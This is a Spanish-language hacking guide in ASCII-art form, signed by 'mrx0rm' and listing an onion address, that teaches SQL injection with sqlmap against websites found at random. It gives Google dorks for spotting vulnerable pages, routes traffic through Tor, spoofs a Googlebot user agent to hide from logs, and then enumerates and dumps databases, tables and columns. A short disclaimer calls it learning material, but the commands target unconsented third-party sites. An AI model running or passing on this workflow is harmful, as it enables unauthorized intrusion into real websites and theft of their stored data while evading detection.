							     _________________  .____                                       
							    /   _____/\_____  \ |    |     _____ _____  ______             
							    \_____  \  /  / \  \|    |    /     \\__  \ \____ \  
							    /        \/   \_/.  \    |___|  Y Y  \/ __ \|  |_> > 
							   /_______  /\_____\ \_/_______ \__|_|  (____  /   __/   
							           \/        \__>       \/     \/     \/|__|         
	




							                     .ed"""" """$$$$be.
							                   -"           ^""**$$$e.
							                 ."                   '$$$c
							                /                      "4$$b
							               d  3                      $$$$
							               $  *                   .$$$$$$
							              .$  ^c           $$$$$e$$$$$$$$.
							              d$L  4.         4$$$$$$$$$$$$$$b
							              $$$$b ^ceeeee.  4$$ECL.F*$$$$$$$
							  e$""=.      $$$$P d$$$$F $ $$$$$$$$$- $$$$$$
							 z$$b. ^c     3$$$F "$$$$b   $"$$$$$$$  $$$$*"      .=""$c
							4$$$$L        $$P"  "$$b   .$ $$$$$...e$$        .=  e$$$.
							^*$$$$$c  %..   *c    ..    $$ 3$$$$$$$$$$eF     zP  d$$$$$
							  "**$$$ec   "   %ce""    $$$  $$$$$$$$$$*    .r" =$$$$P""
							        "*$b.  "c  *$e.    *** d$$$$$"L$$    .d"  e$$***"
							          ^*$$c ^$c $$$      4J$$$$$% $$$ .e*".eeP"
							             "$$$$$$"'$=e....$*$$**$cz$$" "..d$*"
							               "*$$$  *=%4.$ L L$ P3$$$F $$$P"
							                  "$   "%*ebJLzb$e$$$$$b $P"
							                    %..      4$$$$$$$$$$ "
							                     $$$e   z$$$$$$$$$$%
							                      "*$c  "$$$$$$$P"
							                       ."""*$$$$$$$$bc
							                    .-"    .$***$$$"""*e.
							                 .-"    .e$"     "*$c  ^*b.
							          .=*""""    .e$*"          "*bc  "*$e..
							        .$"        .z*"               ^*$e.   "*****e.
							        $$ee$c   .d"                     "*$.        3.
							        ^*$E")$..$"                         *   .ee==d%
							           $.d$$$*                           *  J$$$e*
							            """""                              "$$$"



                                              darkweb:   http://jq6vizzuh6ydq2xcogszcey7ti5lwg6cekgrbh33finxskirpfqytpyd.onion/  


                                                                 

	          Antes de empezar, muchas gracias a los visitantes de esta guía. Quiero aclarar que el material citado es con motivos de aprendizaje y no me 											hago responsable de su uso.

		


	*Google Dork: Google dorks son combinaciones de operadores de búsqueda especiales que se utilizan para extraer 	información valiosa o sensible desde Google. Es 	un término despectivo ya que dork en inglés significa "idiota". Además se denomina "googledork" a una persona inepta o tonta según lo revelado por Google.

	*Bot: Un bot es un programa informático, imitando el comportamiento de un humano. En como Wikipedia, un bot puede realizar funciones rutinarias de edición.
	
	*DB: Una DB es una base de datos. (En inglés Data Base)

	*Dump: Dump se refiere a la acción del volcado de información/memoria.


		 
									+------------------------+
									| 1) Encontrar objetivo  |
									+------------------------+

   				     Esto lo podemos hacer o bien haciendo *Dork con comandos o simplemente buscarlo en San Google

     
							sqlmap -g (cualquiera de las inurl citadas abajo)

  
		   					         inurl:index.php?id= / section.php?id=       

						          	          inurl:gallery.php?id=

		    							  inurl:post.php?id=

                   							  inurl:article?id=

							     +--------------------------------------------+
							     | 2) Conectarse mediante un proxy (VPN/Tor)  |
							     +--------------------------------------------+

							  --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 

								     +----------------------------+
								     | 3) Ocultarse de los Logs   |
								     +----------------------------+

   			Es importante ocultarse de los logs o como mínimo reducirlos, el siguiente comando crea una *bot de Google para ocultarse:


				       --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

								         +--------------------+
								         | 4) Listar las *DB  |  *Nota: En todas las *DB existe la "information_schema"
								         +--------------------+
       
     sqlmap -u "link" --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)" --dbs 

								       +-----------------------+
								       | 5) Tablas y Columnas  |
								       +-----------------------+

   			Una vez hecho este previo proceso para mantener un poco más la anonimidad procederemos a listar las tablas y columnas de la DB.   

	     								   ___.:Tablas:.___  
	
					    sqlmap -u "link" (Proteción tor + *bot) --dbs -D "nombre de la *DB" --tables

	    								 ___.:Columnas:.___

				sqlmap -u "link" (Proteción tor + *bot) --dbs -D "nombre de la *DB" -T "nombre de la tabla" --columns

									     +-----------+
									     | 6) *Dump  |    
									     +-----------+

   				       Aquí tenemos varias opciones: *dump a todo el contenido - columnas/tablas específicas.

	    								   ___.:Dump All:.___
	
				sqlmap -u "link" (Protecion tor + *bot) --dbs -D "nombre de la *DB" -T "nombre de la tabla" -C --dump-all

	     								    ___.:Dump:.___
 
				sqlmap -u "link" (Protecion tor + *bot) --dbs -D "nombre de la *DB" -T "nombre de la tabla" -C --dump
   
   						    Trás finalizar, se creará un fichero en la ruta especificada.

	

							+----------------+----------------------------------------+
							|   Comandos     |              Utilidades                |
							|                |                                        |
							+----------------+----------------------------------------+
							|      -g        |              Dork scann                |
							+----------------+----------------------------------------+
							|      -u        |              Target URL                |
							+----------------+----------------------------------------+
							|    --dbs       |            Muestra la DB               |
							+----------------+----------------------------------------+
							|      -D        |           Check de las DB              |
							+----------------+----------------------------------------+
							| --tables / -T  |        Lista las tablas de la DB       |
							+----------------+----------------------------------------+
							| --columns / -C |         "  las columnas "              |
							+----------------+----------------------------------------+
							|    --dump      |         Volcado de información         |
							+----------------+----------------------------------------+
							|  --dump-all    |           " toda la info               |
							+----------------+----------------------------------------+
							

									      +-------+
								              | Nota  |
                							      +-------+

		Cómo en cualquier programa, si tenéis alguna duda o curiosidad por más comandos usad la función -h (-help, -hh), aquí sólo expongo algunos de 									  los commandos que me han parecido útiles para la guía.

									        ___
							 		       __H__
		 							 ___ ___[']_____ ___ ___                                                                       
         								|_ -| . [)]     | .'| . |
	 	        						|___|_  [.]_|_|_|__,|  _|                                           
               		     						      |_|V          |_|



                				                           			/)
                                				                 	       //
                  						 	     __*_             //
             	     						          /-(____)           //
                    						         ////- -|\          //
                 					              ,____o% -,_          //
                					             /  \\   |||  ;       //
               						            /____\....::./\      //
              						           _/__/#\_ _,,_/--\    //
              						            /___/######## \/""-(\ <\____/\ 
            						          /___\  __  /___\/     |    _
           						         /____\\'__'//____\   __| by mrx0rm

				
								    mrx0rm@mail2tor.com


	 Esta es mi primera guía, así que antes de lapidarme agradecería que fuérais críticos constructivos y ayudéis a mejorar a la gente, toda opinión coherente 								     será bienvenida. Gracias por su atención.
